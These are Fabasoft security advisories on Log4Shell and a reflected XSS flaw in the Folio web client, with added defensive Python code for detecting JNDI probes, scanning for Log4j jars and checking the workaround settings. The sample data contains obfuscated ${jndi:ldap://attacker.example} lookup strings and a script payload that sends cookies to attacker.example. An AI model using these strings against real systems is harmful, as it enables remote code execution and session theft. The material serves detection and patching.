First published: 13 December 2021
Last update: 22 December 2021
ID: FSC31322
Affected Components: Fabasoft Cloud, Fabasoft Folio
Severity: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H, Base Score: 10.0 (Critical)
Status: Final
CVEs: CVE-2021-44228
Information on the further Log4j issues CVE-2021-45046 and CVE-2021-45105 can be found at the end of this article.
A flaw was found in the Java logging library Apache Log4j in versions from 2.0.0 (including beta versions) up to and including 2.14.1. It allows a remote attacker to execute code on the server if the application logs an attacker-controlled string that contains a JNDI lookup (for example an expression of the form ${jndi:ldap://...}) pointing at an LDAP server under the attacker's control: Log4j evaluates the lookup, fetches the referenced object and loads it.
In order to exploit this flaw you need:
A lot of software products and libraries use the Log4j library and therefore may be affected.
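The lookup string described above rarely arrives in plain form; scanners and attackers wrap the word jndi in nested ${lower:...}, ${upper:...} and ${::-x} expressions or URL-encode it, so a naive grep for "jndi:ldap" misses most probes. The following detector is an added example (not Fabasoft tooling and not part of the advisory): it peels those wrappers off the way Log4j's own substitution would and then looks for the remaining ${jndi:...} expression. The log lines are constructed for the demonstration; the host attacker.example is a placeholder.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from any Fabasoft system):
# three JNDI probes in different obfuscation styles plus two benign lines.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0100] "GET /folio/ HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - [13/Dec/2021:10:01:03 +0100] "GET /folio/?x=${${lower:j}ndi:${lower:l}dap://attacker.example/b} HTTP/1.1" 400 120 "-" "curl/7.79"',
    '10.0.0.7 - - [13/Dec/2021:10:01:04 +0100] "GET /folio/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '10.0.0.8 - - [13/Dec/2021:10:01:05 +0100] "GET /folio/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:06 +0100] "POST /folio/login HTTP/1.1" 302 0 "-" "${env:HOME}"',
]

# A ${...} expression with no further ${ or } inside it: the innermost lookup.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we are actually looking for once the obfuscation has been peeled off.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def _resolve(m) -> str:
    """Evaluate the wrappers attackers nest around 'jndi' the way Log4j's
    StrSubstitutor would; anything else is left untouched."""
    body = m.group(1)
    if ":-" in body:                      # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep and kind.strip().lower() == "lower":
        return arg.lower()
    if sep and kind.strip().lower() == "upper":
        return arg.upper()
    return m.group(0)                     # e.g. ${jndi:...} or ${env:...}: keep as-is


def normalize(text: str) -> str:
    """URL-decode, then substitute innermost lookups until nothing changes."""
    text = unquote(text)
    for _ in range(20):                   # bounded: each pass peels one nesting level
        new = INNERMOST.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def find_jndi_probes(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (1-based line number, JNDI URI scheme, normalized lookup) for
    every line whose normalized form contains a ${jndi:...} expression."""
    hits: List[Tuple[int, str, str]] = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            end = norm.find("}", m.start())
            lookup = norm[m.start(): end + 1] if end != -1 else norm[m.start():]
            hits.append((n, m.group(1).lower(), lookup))
    return hits


if __name__ == "__main__":
    for n, scheme, lookup in find_jndi_probes(SAMPLE_LOG_LINES):
        print(f"line {n}: {scheme} lookup {lookup}")
```

Run it over web server access logs and any application log that records request headers (User-Agent, X-Forwarded-For and similar are the usual carriers). A hit only proves an attempt; whether it succeeded depends on the Log4j version in use and on whether the server could reach the named host, which is what the outbound connection logs of that time window should be checked for.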
The following Fabasoft products may be affected by the vulnerability:
Not affected:
Fabasoft Folio Client and Fabasoft Cloud Client are not affected in any version of Fabasoft Folio / Fabasoft eGov-Suite.
You can check which Log4j library is in use with a file search on your Fabasoft Folio and Mindbreeze servers:
Search for log4j* in:
Windows Folio: C:\Program Files\Fabasoft\
Windows Folio: C:\ProgramData\Fabasoft\INSTALLDIR
Windows Mindbreeze Enterprise: Search the full server for log4j*
Linux Folio: /var/opt/fabasoft/cache/INSTALLDIR
Linux Mindbreeze Enterprise: Search the full server for log4j*
If your company develops its own Java solutions or apps for your Fabasoft Folio installation, check your repositories for Log4j dependencies. Also check every other Java library you use to make sure it does not bundle an affected Log4j version, for example inside a shaded or fat jar, where the file name no longer says log4j.
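A file-name search as described above finds the jars named log4j-*, but not a Log4j copy repackaged inside another jar or war. The following scanner is an added example (not Fabasoft's tooling and not part of the advisory) that walks a directory such as the INSTALLDIR paths listed above, opens every archive, recurses into nested archives, reads the version from the manifest or the file name and checks whether the JndiLookup class that CVE-2021-44228 depends on is still packaged. The version-to-CVE mapping follows the Log4j project's release notes; the 2.12.x (Java 7) and 2.3.x (Java 6) branches are included so their fixed releases are not reported as vulnerable.

```python
import io
import os
import re
import zipfile
from typing import Dict, List, Optional

# The class that makes CVE-2021-44228 reachable; the Log4j project removed it in 2.16.0.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def classify(version: Optional[str], has_jndi_lookup: bool) -> str:
    """Map a Log4j version to the advisories it is still open to, following the
    Log4j release notes (2.12.x is the Java 7 branch, 2.3.x the Java 6 branch)."""
    if version is None:
        if has_jndi_lookup:
            return "JndiLookup.class present, version unknown: treat as CVE-2021-44228"
        return "version unknown"
    m = VERSION_RE.match(version)
    if not m:
        return f"unparseable version {version!r}"
    major, minor, patch = (int(x or 0) for x in m.groups())
    if major == 1:
        return "Log4j 1.x (end of life): CVE-2021-4104 only if a JMSAppender is configured"
    if major != 2:
        return f"not a Log4j 2 version: {version}"
    if minor >= 17 or (minor == 12 and patch >= 3) or (minor == 3 and patch >= 1):
        return "not vulnerable (2.17.0 / 2.12.3 / 2.3.1 or later)"
    if minor == 16 or (minor == 12 and patch == 2):
        return "vulnerable: CVE-2021-45105"
    if minor == 15:
        return "vulnerable: CVE-2021-45046, CVE-2021-45105"
    return "vulnerable: CVE-2021-44228, CVE-2021-45046, CVE-2021-45105"


def _version_from_manifest(zf: zipfile.ZipFile) -> Optional[str]:
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for key in ("Implementation-Version", "Bundle-Version"):
        m = re.search(rf"^{key}:\s*(\S+)", manifest, re.MULTILINE)
        if m:
            return m.group(1)
    return None


def _version_from_name(path: str) -> Optional[str]:
    m = re.search(r"log4j[\w.-]*?-(\d+\.\d+(?:\.\d+)?)", os.path.basename(path), re.IGNORECASE)
    return m.group(1) if m else None


def scan_archive(data: bytes, path: str, findings: List[Dict], depth: int = 0) -> None:
    """Inspect one archive (given as bytes) and recurse into archives nested in it,
    which is how wars and fat jars carry their dependencies."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        has_jndi = JNDI_LOOKUP_CLASS in names
        named_log4j = "log4j" in os.path.basename(path).lower()
        if named_log4j or has_jndi:
            # For a repackaged (shaded) archive the outer manifest is the app's, not Log4j's.
            version = (_version_from_manifest(zf) or _version_from_name(path)) if named_log4j else None
            findings.append({"path": path, "version": version, "jndi_lookup": has_jndi,
                             "status": classify(version, has_jndi)})
        if depth < 3:
            for name in names:
                if name.lower().endswith(ARCHIVE_SUFFIXES):
                    scan_archive(zf.read(name), f"{path}!/{name}", findings, depth + 1)


def scan_tree(root: str) -> List[Dict]:
    """Walk ROOT (for example /var/opt/fabasoft/cache/INSTALLDIR) and report
    every Log4j archive found, including ones nested inside other archives."""
    findings: List[Dict] = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, fname)
                with open(full, "rb") as fh:
                    scan_archive(fh.read(), full, findings)
    return findings


if __name__ == "__main__":
    import sys
    for f in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{f['path']}\t{f['version']}\t{f['status']}")
```

The jndi_lookup flag is the field to act on: a log4j-api jar of an old version is reported by name but does not contain the lookup class, whereas a log4j-core jar, or an application jar that shades one, does. Run the scanner as the service account on each Folio and Mindbreeze server and keep the output as evidence for the hotfix roll-out.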
A hotfix was applied in the Fabasoft Business Process Cloud on 13 December 2021.
Mitigation measures had been applied before that. So far, there is no indication that the vulnerability has been exploited.
Although not affected by the follow-up issue CVE-2021-45046, a build using Log4j version 2.16.0 was deployed in the Fabasoft Business Process Cloud on 19 December 2021.
Although not affected by CVE-2021-45105, a build using Log4j version 2.17.0 was deployed in the Fabasoft Business Process Cloud on 21 December 2021.
Currently, a hotfix is available for:
Fabasoft Folio 2021 November Release (build 21.11.0.150)
Fabasoft eGov-Suite 2021 November Release (build 21.11.0.150.007)
Please contact Fabasoft Enterprise Support to request the hotfix package for your version. The hotfixed products use at least Log4j version 2.17.0.
It is strongly recommended to install the provided hotfix for Fabasoft Folio 2021 November Release or Fabasoft eGov-Suite 2021 November Release.
The message lookups that this vulnerability relies on can be disabled with a Log4j system property passed as a Java option. Note that this property only exists in Log4j 2.10.0 and later, and that it is a stopgap: CVE-2021-45046 later showed that it does not cover every lookup path, so the hotfix should still be installed.
For affected Fabasoft Folio 2021 versions, please use this workaround on all servers until the hotfix is installed:
Fabasoft Folio environment variables can be configured in two ways, see https://help.folio.fabasoft.com/index.php?topic=doc/Fabasoft-Folio-Envir... for details.
Option 1 - Per server configuration
Option 2 - Per service configuration
Even when using option 1, double-check that the server-wide setting is not overridden by a per-service configuration.
Add the following into the file
-Dlog4j2.formatMsgNoLookups=true
Make sure that the file does not end with a line break.
Restart all Kernel instances on that machine.
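Two details in the steps above are easy to get wrong on a server: a trailing line break in the options file, and a per-service file that silently overrides the server-wide one. The following checker is an added example (not Fabasoft's tooling and not part of the advisory). It assumes, which the advisory does not state, that the file holds the JVM options verbatim and that a per-service file replaces the whole server-wide value; adjust the precedence rule if your installation differs.

```python
import os
from typing import Dict, List, Optional

OPTION = "-Dlog4j2.formatMsgNoLookups=true"
CONFLICT = "-Dlog4j2.formatMsgNoLookups=false"


def check_java_options_file(path: str) -> List[str]:
    """Return the problems found in one Java-options file (empty list = OK).
    Assumption: the file holds the JVM options verbatim and is read as-is,
    which is why a trailing line break matters."""
    if not os.path.exists(path):
        return [f"{path}: file missing"]
    with open(path, "rb") as fh:
        raw = fh.read()
    problems: List[str] = []
    if raw.startswith(b"\xef\xbb\xbf"):
        problems.append(f"{path}: UTF-8 BOM at start of file (the first option would not be recognised)")
    tokens = raw.decode("utf-8", "replace").lstrip("\ufeff").split()
    # last occurrence of each relevant token: the JVM takes the last -D definition
    last = {t: i for i, t in enumerate(tokens) if t in (OPTION, CONFLICT)}
    if OPTION not in last:
        problems.append(f"{path}: {OPTION} not set")
    elif last.get(CONFLICT, -1) > last[OPTION]:
        problems.append(f"{path}: a later {CONFLICT} overrides it")
    if raw.endswith((b"\n", b"\r")):
        problems.append(f"{path}: file ends with a line break")
    return problems


def effective_setting(server_file: str, service_file: Optional[str] = None) -> Dict[str, object]:
    """Option 2 (per-service file) wins over option 1 (server-wide file), so a
    per-service file that lacks the option undoes the server-wide workaround.
    Assumption: a per-service file replaces the whole value, not just parts of it."""
    if service_file and os.path.exists(service_file):
        scope, path = "service", service_file
    else:
        scope, path = "server", server_file
    problems = check_java_options_file(path)
    protected = not any("not set" in p or "overrides" in p or "missing" in p for p in problems)
    return {"scope": scope, "path": path, "protected": protected, "problems": problems}


if __name__ == "__main__":
    import sys
    result = effective_setting(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else None)
    print(result)
```

Run it once per service with the server-wide file as the first argument and that service's file as the second; a "protected": False result, or a "line break" finding, means the kernel restart in the last step will not pick up the workaround.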
Additional vulnerabilities have been reported by the Log4j project (CVE-2021-45046 and CVE-2021-45105). Both require a logging configuration that uses a non-default Pattern Layout with a Context Lookup (for example ${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc or %MDC), so that attacker-controlled data reaches the lookup through the thread context.
Fabasoft Folio does not use such a pattern layout in its code, therefore no Fabasoft Folio version and no version of the Fabasoft Business Process Cloud is or was affected.
Nevertheless Fabasoft will update the Log4j library to version 2.17.0, which closes CVE-2021-45105, in the hotfixed versions for CVE-2021-44228 and in all future releases.
Fabasoft Mindbreeze Enterprise does not use any of the vulnerable features, therefore no Fabasoft Mindbreeze Enterprise version is affected.
During the investigation a further vulnerability in Log4j version 1.2 was identified, tracked as CVE-2021-4104 (deserialization of untrusted data through JMSAppender, CVSS v3 Base Score 8.1, High). It is only reachable when the attacker can write to the Log4j configuration.
No Fabasoft Folio version is affected by CVE-2021-4104.
First published: 28 August 2021
Last update: 16 September 2021
ID: FSC29337
Affected Components: Fabasoft Folio Webservices, Fabasoft Cloud Webservices
Severity: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N, Base Score: 7.3 (High)
Status: Final
CVEs: -
If malicious content is passed in a parameter of the first request to the Fabasoft Folio web client, the error response reflects that content. Because the content type of the response is not interpreted correctly, the browser renders the reflected content, so script contained in it is injected into the web client (reflected cross-site scripting).
An attacker may send a user a link containing the malicious content. If the user opens the link in the web browser, the code may be executed in the current user's context.
Fix: the parameter values are no longer part of the error message.
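To make the failure mode and the fix concrete, the following added example (not Fabasoft code and not taken from the advisory) models the error response as a (status, headers, body) tuple: the vulnerable shape echoes the parameter into a body with no usable content type, an escaped variant shows what to do if the value must be displayed, and the hardened variant does what the hotfix does and leaves the value out entirely. The parameter value and the host attacker.example are constructed for the demonstration.

```python
import html
from typing import Dict, Tuple

Response = Tuple[int, Dict[str, str], str]

# Constructed parameter value for the demonstration (not a payload from the advisory).
EVIL = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'


def error_response_vulnerable(param_value: str) -> Response:
    """Before: the parameter value is copied verbatim into the error text and the
    response carries no usable content type, so the browser treats the body as HTML."""
    return 500, {}, f"Error: invalid value for parameter: {param_value}"


def error_response_escaped(param_value: str) -> Response:
    """If the value must be shown: HTML-escape it and declare the content type
    explicitly, with nosniff so the browser cannot second-guess it."""
    headers = {"Content-Type": "text/html; charset=utf-8", "X-Content-Type-Options": "nosniff"}
    return 400, headers, f"<p>Error: invalid value for parameter: {html.escape(param_value, quote=True)}</p>"


def error_response_hardened(param_value: str) -> Response:
    """What the hotfix does: the value is not part of the error message at all."""
    headers = {"Content-Type": "text/plain; charset=utf-8", "X-Content-Type-Options": "nosniff"}
    return 400, headers, "Error: invalid value for a request parameter."


def reflects_executable_markup(param_value: str, response: Response) -> bool:
    """Conservative check a tester can run against an error response: is the input
    echoed unchanged into a body that the browser might render as HTML?"""
    _status, headers, body = response
    if param_value not in body:
        return False                      # not reflected verbatim (removed or escaped)
    ctype = headers.get("Content-Type", "").lower()
    nosniff = headers.get("X-Content-Type-Options", "").lower() == "nosniff"
    # Verbatim reflection is only treated as inert when the browser is told,
    # and cannot override, that the body is plain text.
    return not (ctype.startswith("text/plain") and nosniff)


if __name__ == "__main__":
    for name, fn in (("vulnerable", error_response_vulnerable),
                     ("escaped", error_response_escaped),
                     ("hardened", error_response_hardened)):
        print(f"{name}: reflects executable markup = {reflects_executable_markup(EVIL, fn(EVIL))}")
```

The check is deliberately strict: a reflected value in a response without both an explicit non-HTML content type and X-Content-Type-Options: nosniff is flagged, because content sniffing is exactly the behaviour the advisory describes.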
A hotfix was applied in the Fabasoft Cloud on 16 August 2021.
A hotfix is provided for all supported Fabasoft Folio / Fabasoft eGov-Suite versions. It is recommended to install this hotfix.
Fixed with the following versions of Fabasoft Folio:
A hotfix is provided for the following Fabasoft Folio versions:
Fixed with the following versions of Fabasoft eGov-Suite:
A hotfix is provided for the following Fabasoft eGov-Suite versions: